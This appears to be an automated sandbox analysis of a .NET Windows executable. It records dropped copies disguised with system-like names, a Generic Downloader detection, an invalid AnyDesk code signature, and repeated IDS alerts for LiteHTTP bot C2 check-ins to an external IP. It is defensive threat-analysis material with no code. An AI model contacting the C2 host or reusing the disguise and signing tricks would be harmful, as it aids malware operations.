                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows multimedia platform.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows nt.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows photo viewer.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows portable devices.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows sidebar.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windowspowershell.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):5.98628667033645
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:3u8A2xjbBT.exe
                                    File size:213'832 bytes
                                    MD5:8391d3b5332c4b1164333ddce388a8c7
                                    SHA1:b982fc92ed38565debf033b0ffaa2181a8caa5e7
                                    SHA256:e201e9a5c9fd3a68f54e2ada061a242df3ed813e56d2b09e2c8efc04953c2f72
                                    SHA512:f42b0ec317a534af6239ec7bfb6ff22e4e3e8abf0316b9a0666b073212f4ba6d989ddce2d40d0ea460e85b245b8637b1801bbf6ca5de9944171af3134cca2c96
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    TLSH:4F24FD9C766071DFC85BC876DEA81C64EA60747B931B9203A06716EDDE0D99BCF180F2
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`................................
                                    Icon Hash:889669d8d8299628
                                    Entrypoint:0x42ff6e
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x67102876 [Wed Oct 16 20:56:22 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                    Signature Valid:false
                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                    Signature Validation Error:The digital signature of the object did not verify
                                    Error Number:-2146869232
                                    Not Before, Not After
                                    • 12/02/2024 01:00:00 13/02/2025 00:59:59
                                    Subject Chain
                                    • CN=AnyDesk Software GmbH, O=AnyDesk Software GmbH, L=Stuttgart, S=Baden-Württemberg, C=DE
                                    Version:3
                                    Thumbprint MD5:E4E34304F4315A15A0BC0E413363721E
                                    Thumbprint SHA-1:CA38CF219C8E9782A8CBBD76643D24E4F2D74B03
                                    Thumbprint SHA-256:AF74DC88EF91477F8A93E5DA98B3C80ECD6CB6A10271DC6DC768EC3F34239BC0
                                    Serial:030E330A8ED28347BDA3BB478E410D7C
                                    Instruction
                                    jmp dword ptr [00402000h]
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2ff14 | 0x57 | .text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x30000 | 0xd2a | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x2f200 | 0x5148 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x32000 | 0xc | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x2000 | 0x2df74 | 0x2e000 | fbf9280960dd4be3c9a7001d86775997 | False | 0.44783882472826086 | data | 5.684170404357887 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc | 0x30000 | 0xd2a | 0xe00 | 7b963963c7becb73098827fbcd1ca2d3 | False | 0.33426339285714285 | data | 3.420638003524452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x32000 | 0xc | 0x200 | 28820010460f6d8077e6b2c8b3524498 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_ICON | 0x30130 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 |  |  | 0.299390243902439
                                    RT_GROUP_ICON | 0x30798 | 0x14 | data |  |  | 1.1
                                    RT_VERSION | 0x307ac | 0x394 | OpenPGP Secret Key |  |  | 0.39192139737991266
                                    RT_MANIFEST | 0x30b40 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347
                                    DLL | Import
                                    mscoree.dll | _CorExeMain
                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                    2024-10-30T12:23:14.597901+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.7 | 49975 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:23:15.081287+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.7 | 49975 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:23:15.081287+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.7 | 49975 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:23:38.754593+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.7 | 49976 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:23:39.251162+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.7 | 49976 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:23:39.251162+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.7 | 49976 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:23:54.035524+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.7 | 49977 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:23:54.521460+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.7 | 49977 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:23:54.521460+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.7 | 49977 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:23:59.675540+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.7 | 49978 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:00.190004+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.7 | 49978 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:00.190004+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.7 | 49978 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:03.014359+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.7 | 49979 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:03.486759+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.7 | 49979 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:03.486759+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.7 | 49979 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:09.706769+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.7 | 49980 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:10.200258+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.7 | 49980 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:10.200258+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.7 | 49980 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:15.115758+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.7 | 49981 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:15.603728+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.7 | 49981 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:15.603728+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.7 | 49981 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:17.472443+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.7 | 49982 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:17.950436+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.7 | 49982 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:17.950436+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.7 | 49982 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:20.567020+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.7 | 49983 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:21.045117+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.7 | 49983 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:21.045117+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.7 | 49983 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:25.847443+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.7 | 49984 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:26.317282+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.7 | 49984 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:26.317282+0100 | 2829909 | ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 | 1 | 192.168.2.7 | 49984 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:29.322052+0100 | 2830238 | ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent | 1 | 192.168.2.7 | 49985 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:29.796910+0100 | 2819705 | ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin | 1 | 192.168.2.7 | 49985 | 87.120.126.5 | 80 | TCP
                                    2024-10-30T12:24:29.796910+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998587.120.126.580TCP
                                    2024-10-30T12:24:41.675648+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998687.120.126.580TCP
                                    2024-10-30T12:24:42.147037+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998687.120.126.580TCP
                                    2024-10-30T12:24:42.147037+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998687.120.126.580TCP
                                    2024-10-30T12:24:56.410071+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998787.120.126.580TCP
                                    2024-10-30T12:24:57.056047+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998787.120.126.580TCP
                                    2024-10-30T12:24:57.056047+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998787.120.126.580TCP
                                    2024-10-30T12:24:57.707786+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998887.120.126.580TCP
                                    2024-10-30T12:24:58.222260+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998887.120.126.580TCP
                                    2024-10-30T12:24:58.222260+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998887.120.126.580TCP
                                    2024-10-30T12:25:10.113371+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998987.120.126.580TCP
                                    2024-10-30T12:25:10.457150+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999087.120.126.580TCP
                                    2024-10-30T12:25:10.614517+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998987.120.126.580TCP
                                    2024-10-30T12:25:10.614517+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998987.120.126.580TCP
                                    2024-10-30T12:25:10.962118+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999087.120.126.580TCP
                                    2024-10-30T12:25:10.962118+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999087.120.126.580TCP
                                    2024-10-30T12:25:17.613322+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999187.120.126.580TCP
                                    2024-10-30T12:25:18.093468+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999187.120.126.580TCP
                                    2024-10-30T12:25:18.093468+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999187.120.126.580TCP
                                    2024-10-30T12:25:19.847638+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999287.120.126.580TCP
                                    2024-10-30T12:25:20.331614+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999287.120.126.580TCP
                                    2024-10-30T12:25:20.331614+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999287.120.126.580TCP
                                    2024-10-30T12:25:33.535198+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999387.120.126.580TCP
                                    2024-10-30T12:25:34.013526+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999387.120.126.580TCP
                                    2024-10-30T12:25:34.013526+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999387.120.126.580TCP
                                    2024-10-30T12:25:37.035238+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999487.120.126.580TCP
                                    2024-10-30T12:25:37.547049+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999487.120.126.580TCP
                                    2024-10-30T12:25:37.547049+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999487.120.126.580TCP
                                    2024-10-30T12:25:49.316513+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999587.120.126.580TCP
                                    2024-10-30T12:25:49.828720+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999587.120.126.580TCP
                                    2024-10-30T12:25:49.828720+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999587.120.126.580TCP
                                    2024-10-30T12:25:53.426019+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999687.120.126.580TCP
                                    2024-10-30T12:25:53.473267+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999787.120.126.580TCP
                                    2024-10-30T12:25:53.892869+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999687.120.126.580TCP
                                    2024-10-30T12:25:53.892869+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999687.120.126.580TCP
                                    2024-10-30T12:25:53.961069+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999787.120.126.580TCP
                                    2024-10-30T12:25:53.961069+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999787.120.126.580TCP
                                    2024-10-30T12:26:00.633144+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999887.120.126.580TCP
                                    2024-10-30T12:26:01.097855+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999887.120.126.580TCP
